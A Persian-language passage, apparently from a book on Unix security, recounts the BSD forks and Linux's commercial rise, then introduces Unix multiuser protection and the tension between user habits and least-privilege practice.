ﺑﺎﻗﻴﻤﺎﻧﺪﻩ ﺩﺭ ﻫﺴﺘﺔ ﺍﺻﻠﻲ ﻛﻪ ﺷﺎﻣﻞ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ AT&Tﻣﻲﺷﺪﻧﺪ ﻭ ﻟﺬﺍ ﺩﺭ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻧـﺸﺪﻩ ﺑـﻮﺩ .ﺩﺭ ﭘـﺎﺋﻴﺰ ۱۹۹۱ﺑﻴـﻞ
ﺟﻮﻟﺘﻴﺰ ٢٥ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺯﺷﮕﺮ ﺍﻳﻨﺘﻞ ﻧﻮﺷﺖ ﻭ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻋﻤﻠﻴﺎﺗﻲ ﺑﻪ ﻧﺎﻡ 360/BSDﭘﺪﻳﺪ ﺁﻭﺭﺩ.
ﻇﺮﻑ ﭼﻨﺪ ﻣﺎﻩ ﮔﺮﻭﻫﻲ ﺍﺯ ﺩﺍﻭﻃﻠﺒﺎﻥ ﻣﻮﻇﻒ ﺷﺪﻧﺪ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﺗﻮﺳﻌﺔ ﺳﻴﺴﺘﻢ ﺗﺸﻜﻴﻞﺷﺪﻩ ﻛﺎﺭ ﻛﻨﻨﺪ ﻭ ﺍﻳﻦ ﺗﻼﺵ ﺁﻧﺎﻥ NetBSD
ﻧﺎﻣﮕﺬﺍﺭﻱ ﺷﺪ .ﻃﺮﺡ NetBSDﺑﺴﺮﻋﺖ ﺍﺯ ﻫﻢ ﭘﺎﺷﻴﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺍﻋﻀﺎ ﻣﻌﺘﻘﺪ ﺑﻮﺩﻧﺪ ﻛﻪ ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﭘﺮﻭﮊﻩ ﺑﺎﻳﺪ ﺁﻧﻘﺪﺭ ﮔﺴﺘﺮﺵ ﻳﺎﺑـﺪ ﻛـﻪ
ﺑﺘﻮﺍﻧﺪ ﺗﺎ ﺟﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ ﻭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺩﺍﻣﻪ ﺩﻫﺪ ،ﻭﻟﻲ ﺍﻋﺘﻘـﺎﺩ
ﮔﺮﻭﻩ ﺩﻳﮕﺮﻱ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺗﺎ ﺁﻧﺠـﺎ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﻪ ﺑﻬﺘـﺮ ﺍﺟـﺮﺍ ﺷـﺪﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﻭﻱ
ﺑﺴﺘﺮ Intel/386ﻭ ﺳﺎﺩﻩﺗﺮ ﺷﺪﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻨﺪ .ﮔﺮﻭﻩ ﺩﻭﻡ ﺍﺯ ﮔﺮﻭﻩ ﺍﻭﻝ ﺟﺪﺍ ﺷـﺪ ﻭ ﭘـﺮﻭﮊﺓ FreeBSDﺭﺍ ﺷـﺮﻭﻉ
ﻛﺮﺩ .ﭼﻨﺪ ﺳﺎﻝ ﺑﻌﺪ ،ﻳﻚ ﮔﺮﻭﻩ ﺍﻧﺸﻌﺎﺑﻲ ﺩﻳﮕﺮ ﺍﺯ ﭘﺮﻭﮊﻩ NetBSDﺟﺪﺍ ﺷﺪ .ﺍﻳﻦ ﮔﺮﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭ ﺑﻮﺩ ﻛﻪ ﺍﻣﻨﻴﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ ﻣـﻮﺭﺩ
ﺗﻮﺟﻪ ﻻﺯﻡ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘﻪﺍﻧﺪ .ﺗﺄﻛﻴﺪ ﺍﻳﻦ ﮔﺮﻭﻩ ﺭﻭﻱ ﺑﺮﺭﺳﻲ ﺩﻗﻴﻖ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﺋﻲ ﻣـﺸﻜﻼﺕ ﺑـﺎﻟﻘﻮﻩ ﺑـﻮﺩ .ﺁﻧﻬـﺎ ﺍﻗﺘﺒـﺎﺱ ﺍﺯ
ﻼ ﺑﺮﺭﺳﻲ ﻧﺸﺪﻩﺑﻮﺩﻧﺪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻧﺪ .ﺍﻳﻦ ﮔـﺮﻭﻩ ﺳـﻮﻡ OpenBSD ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻭ driverﻫﺎ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻛﻴﻔﻴﺖ ﻛﺎﻣ ﹰ
ﻧﺎﻡ ﮔﺮﻓﺖ.
ﻣﻲﮔﺮﺩﻧﺪ .ﺍﻳﻦ ﺭﻭﺵ ﺍﮔﺮﭼﻪ ﺑﺮﺍﻱ ﻫﻤﺔ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﻛﺎﺭﺑﺮﺩ ﻧﺒﻮﺩ ،ﺍﻣﺎ ﻏﺎﻟﺒﹰﺎ ﺑﻬﺘﺮ ﺍﺯ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻨﻔﺮﺩ ﺟﻮﺍﺏ ﻣﻲﺩﺍﺩ ﻭ ﻋـﻼﻭﻩ
ﺑﺮ ﺁﻥ ﻫﺰﻳﻨﺔ ﺑﺴﻴﺎﺭ ﻛﻤﺘﺮﻱ ﺻﺮﻑ ﺁﻥ ﻣﻲﺷﺪ .ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﺑﻮﺩ ﻭ Beowulfﻧﺎﻡ ﺩﺍﺷﺖ ،ﻣﺒﺘﻨﻲ ﺑﺮ
Linuxﺑﻮﺩ .ﺑﻪ ﺩﻟﻴﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﻥ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﺗﻮﺳﻌﺔ ﻫﻤﻪﺟﺎﻧﺒﻪ ﺁﻥ ﺗﻮﺳﻂ ﺟﺎﻣﻌﺔ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﺍﻱ Linux ،ﺑـﻪ ﺳـﺮﻋﺖ ﻣﻴـﺎﻥ
ﺳﺎﻳﺮ ﮔﺮﻭﻫﻬﺎﻱ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻛﻪ ﻣﺎﻳﻞ ﺑﻮﺩﻧﺪ ﻛﺎﺭﻱ ﻣﺸﺎﺑﻪ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﭘﺨﺶ ﺷﺪ.
ﻫﻤﺔ ﺍﻳﻦ ﻋﻼﻳﻖ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺎ ﻣﺸﻜﻼﺕ ﻓﺰﺍﻳﻨﺪﻩ ﺑﺎﺯﺍﺭ ﺍﻧﺤﺼﺎﺭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Microsoftﺩﺭ ﻫـﻢ ﺁﻣﻴﺨـﺖ ،ﺗﻮﺟـﻪ ﺩﻭ ﺷـﺮﻛﺖ IBMﻭ
Dellﻛﻪ ﻫﺮ ﺩﻭ ﺍﺯ Linuxﺍﻋﻼﻡ ﺣﻤﺎﻳﺖ ﺗﺠﺎﺭﻱ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺟﻠﺐ ﻛﺮﺩ .ﺩﺭ ﻫﻤﻴﻦ ﺍﻳﺎﻡ ﺩﻭ ﺷﺮﻛﺘﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ Linux
ﻣﻲﭘﺮﺩﺍﺧﺘﻨﺪ Redhat -ﻭ - VA Linuxﺩﻭ ﻓﻘﺮﻩ ﺍﺯ ﻣﻮﻓﻖﺗﺮﻳﻦ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺍﻭﻟﻴﺔ ﻣﺮﺩﻣﻲ ﺩﺭ ﺗﺎﺭﻳﺦ ﺑـﻮﺭﺱ ﺳـﻬﺎﻡ ﺍﻳﺎﻟـﺖ ﻣﺘﺤـﺪﻩ ﺭﺍ
ﻧﺼﻴﺐ ﺧﻮﺩ ﻛﺮﺩﻧﺪ .ﻣﺪﺕ ﻛﻮﺗﺎﻫﻲ ﭘﺲ ﺍﺯ ﺁﻥ HPﺍﻋﻼﻡ ﻛﺮﺩ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ Linuxﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﺶ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ.
ﺍﻣﺮﻭﺯﻩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﺎﻏﻞ ﻭ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺑﺎ Linuxﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ .ﺁﻧﻬﺎ ﺍﺯ Linuxﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ،
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻭ ﺩﺭ ﻭﺳﻌﺖ ﻛﻤﺘﺮ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺑﺴﺘﺮ ﻋﻤﻮﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻨـﺪ .ﻣـﺸﺎﻏﻞ
ﺑﺠﺎﻱ ﺧﺮﻳﺪ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﻫﺎ ،ﺧﻮﺷﻪﻫﺎﻱ ﺑﺰﺭﮒ Linuxﺭﺍ -ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺴﺎﺋﻞ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺰﺭﮒ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺍﺟـﺮﺍﻱ ﻣـﻮﺍﺯﻱ ﺣـﻞ ﻛﻨﻨـﺪ -
ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﻧﺪ .ﺑﻪ ﻃﻮﺭ ﻣﺸﺎﺑﻪ ،NetBSD ،FreeBSDﻭ OpenBSDﺑﺨﻮﺑﻲ ﻣﻨﺎﺳﺐ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩﻫـﺎ ﻫـﺴﺘﻨﺪ ﻭ ﺑـﻪ ﻣﻴـﺰﺍﻥ ﻭﺳـﻴﻊ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺮﺍﺳﺎﺱ ﺷﻮﺍﻫﺪ ﻏﻴﺮ ﺭﺳﻤﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ Linuxﻧﺴﺒﺖ ﺑﻪ ﻫﺮ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ ،ﺭﺷـﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﺑﻴـﺸﺘﺮﻱ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻃﺒﻖ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻋﻼﻡﺷﺪﺓ ﺗﺠﺎﺭﻱ ﺍﺯ ﺟﻤﻠﻪ ﺭﻳﺴﻜﻬﺎﻱ ﺍﻋﻼﻡﺷﺪﻩ ﺗﻮﺳﻂ ﺷﺮﻛﺖ ،Sun Microsystemsﺑﻨﻈﺮ ﻣـﻲﺭﺳـﺪ
Linuxﻣﻮﺍﺯﻧﺔ ﺭﺷﺪ ﺑﻬﺘﺮﻱ ﺩﺭ ﺑﺎﺯﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ،ﺣﺪﺍﻗﻞ ﺑﻪ ﺩﻟﻴﻞ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻭ ﻛﺎﺭﺍﻳﻲ ،ﻣﺎ ﺍﺯ ﮔﻮﻧـﻪﻫـﺎﻱ ﺩﻳﮕـﺮ
BSDﻫﺎ ﺍﻧﺘﻈﺎﺭ ﻣﺤﻮ ﺷﺪﻥ ﻧﺪﺍﺭﻳﻢ؛ ﺯﻳﺮﺍ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﮔﺮﻭﻩﻫﺎﻱ BSDﻫﺎ ﺑﻪ ﺣﻴﺎﺕ ﺟﺪﺍﮔﺎﻧﺔ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﻣﻲﺩﻫﻨﺪ ،ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ ﻛـﻪ ﺍﺯ
ﺳﻬﻢ ﺑﺎﺯﺍﺭ Linuxﺑﻬﺮﻩﺍﻱ ﺑﮕﻴﺮﻧﺪ.
ﻧﺴﺨﻪﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Linuxﻭ BSDﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺗﻨﻬﺎ ﺑﺎ ﻳﻚ ﻓﻼﭘﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ﻛﻪ
ﺷﺎﻣﻞ picoBSD ،Trinixﻭ closedBSDﻫﺴﺘﻨﺪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫﺎﻳﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﻣﻨﻴﺖ ﺯﻳـﺎﺩ ﻻﺯﻡ ﺍﺳـﺖ ،ﺍﺯ ﺟﻤﻠـﻪ
ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ،ﺗﺮﻣﻴﻢ ،ﻭ ﻟﻮﺍﺯﻡ ﺷﺒﻜﻪ.
ﺍﻣﻨﻴﺖ ﻭ Unix
ﻫﻤﺎﻧﻨﺪ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺳـﺎﺱ ﺁﻧﻬـﺎ ﺑـﺮ ﭘﺎﻳـﺔ Microsoft Windows NTﺍﺳـﺖ Unix ،ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﭼﻨـﺪﻛﺎﺭﺑﺮﻩ ٢٦ﻭ
ﭼﻨﺪﻭﻇﻴﻔﻪﺍﻱ ٢٧ﺍﺳﺖ .ﻣﻨﻈﻮﺭ ﺍﺯ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﺍﻓﺮﺍﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ.
ﭼﻨﺪﻭﻇﻴﻔﻪﺍﻱ ﻧﻴﺰ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ .ﻳﻜـﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ
ﻃﺒﻴﻌﻲ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺗﺪﺍﺧﻞ ﻛﺎﺭ ﭼﻨﺪ ﻧﻔﺮ )ﻳﺎ ﭼﻨﺪ ﺑﺮﻧﺎﻣﻪ( ﻣﺨﺘﻠـﻒ ﻛـﻪ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺑﻄـﻮﺭ ﻫﻤﺰﻣـﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ .ﺑﺪﻭﻥ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﺣﻔﺎﻇﺘﻲ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺧﻮﺩﺳﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫـﺪ،
ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭘﺎﻙ ﻛﻨﺪ ،ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻞ ﻛﺎﺭ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻣﺨﺘﻞ ﻧﻤﺎﻳﺪ .ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﭼﻨـﻴﻦ
ﺳﻮﺍﻧﺤﻲ ،ﻧﻮﻋﻲ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻓﻠﺴﻔﻪ ﻃﺮﺍﺣﻲ Unixﺟﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺍﺳﺖ.
ﺍﻣﻨﻴﺖ Unixﺗﺴﻬﻴﻼﺗﻲ ﺑﻴﺶ ﺍﺯ ﺣﻔﺎﻇﺖ ﺻﺮﻑ ﺍﺯ ﺣﺎﻓﻈﻪ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ Unix .ﺩﺍﺭﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ﻣﺠﻬﺰ ﺍﺳﺖ ﻛـﻪ ﺭﺍﻫﻬـﺎﻳﻲ
ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ،ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﻨﺪ ،ﻭ ﺍﺯ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ ﺭﺍ ﻛﻨﺘـﺮﻝ
ﻣﻲﻛﻨﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺯﻣﺎﻧﻴﻜﻪ ﺳﻴﺴﺘﻢ ﺩﺭﺳﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ،ﺑﺪﻭﻥ ﺩﻗﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ،ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﺍﺷﻜﺎﻝ ﺍﺳﺖ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﺪ ،ﺍﻳﻦ ﻣﻜﺎﻧﻴﺰﻣﻬﺎ ﻛﻤﻚ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﻨﻨﺪ .ﺗﻘﺮﻳﺒﹰﺎ ﺗﻤﺎﻡ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻃﻲ ﺳﺎﻟﻬﺎﻱ ﻣﺘﻤﺎﺩﻱ ﺩﺭ Unixﭘﻴﺪﺍ ﺷﺪﻩﺍﻧـﺪ ﺭﻳـﺸﻪ ﺩﺭ
ﺍﻳﻨﮕﻮﻧﻪ ﻣﺴﺎﺋﻞ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺗﺎ ﻧﺎﺭﺳﺎﻳﻲﻫﺎﻱ ﻃﺮﺍﺣﻲ ﺩﺭﻭﻧﻲ ﺳﻴﺴﺘﻢ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ Unixﻣﻌﺘﻘﺪﻧﺪ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺴﺒﺘﹰﺎ ﻣﻄﻤﺌﻦ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ .ﻣﺎ ﻣﻌﺘﻘﺪﻳﻢ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦﺗـﺮ ﺑﺎﺷـﻨﺪ،
ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﺴﺎﺋﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮ ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻂ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ.
ﺍﻧﺘﻈﺎﺭﺍﺕ ﻭ ﺍﻣﻴﺪﻭﺍﺭﻳﻬﺎ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﻄﻮﺭ ﺑﺎﺭ ﺁﻣﺪﻩﺍﻧﺪ ﻛﻪ Unixﺭﺍ ﺑﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺧﺎﺻﻲ ﺑﺒﻴﻨﻨﺪ .ﺗﺠﺮﺑﺔ ﺁﻧﻬﺎ ﺍﺯ Unixﺩﺭ ﻛﺎﺭﻫـﺎﻱ ﻋﻠﻤـﻲ ،ﺳـﺮﮔﺮﻣﻲ ،ﻭ
ﺗﺤﻘﻴﻘﺎﺗﻲ ،ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﺑﻮﺩﻩ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻤﺔ ﺷﺎﺧﻪﻫﺎ ﻭ ﺍﻏﻠﺐ ﻓﺮﺍﻣﻴﻦ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ .ﻛـﺎﺭﺑﺮﺍﻥ ﺷـﺎﻳﺪ ﻋـﺎﺩﺕ ﻛـﺮﺩﻩ
ﺑﺎﺷﻨﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻳﺸﺎﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﺎﺷﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻫﻤﭽﻨﻴﻦ ﻏﺎﻟﺒﹰﺎ ﻋﺎﺩﺕ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻧﺮﻡﺍﻓـﺰﺍﺭ
ﻻ ﺩﺳﺘﺮﺳﻲ ﺳﻄﺢ ﺳﻴﺴﺘﻤﻲ )ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﺢ ﺩﺳﺘﺮﺳـﻲ( ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺁﻥ ﻻﺯﻡ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺑﺴﺎﺯﻧﺪ ﻭ ﻧﺼﺐ ﻛﻨﻨﺪ؛ ﻛﺎﺭﻱ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺍﺳﺖ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺔ ﺍﻳﻦ ﺍﻧﺘﻈﺎﺭﺍﺕ ﺧﻼﻑ ﻳﻚ ﻣﻨﺶ ﺧﻮﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺍﻣﻨﻴـﺖ ﻗـﻮﻱﺗـﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﻢ ﻻﺯﻡ ﺍﺳـﺖ ﻣـﺪﻳﺮﺍﻥ ﻭ
ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎ ﮔﻬﮕﺎﻩ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﻓﺮﺍﻣﻴﻨﻲ ﻛﻪ ﭼﻨﺪﺍﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻔـﺸﺎﻥ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﻣﺤـﺪﻭﺩ
ﮐﻨﻨﺪ .ﺑﺮ ﺍﻳﻦ ﺍﺳﺎﺱ ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﺵ ﺑﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮ ﻣﺘﻨﻲ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻻﺯﻡ ﻧﻴﺴﺖ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ
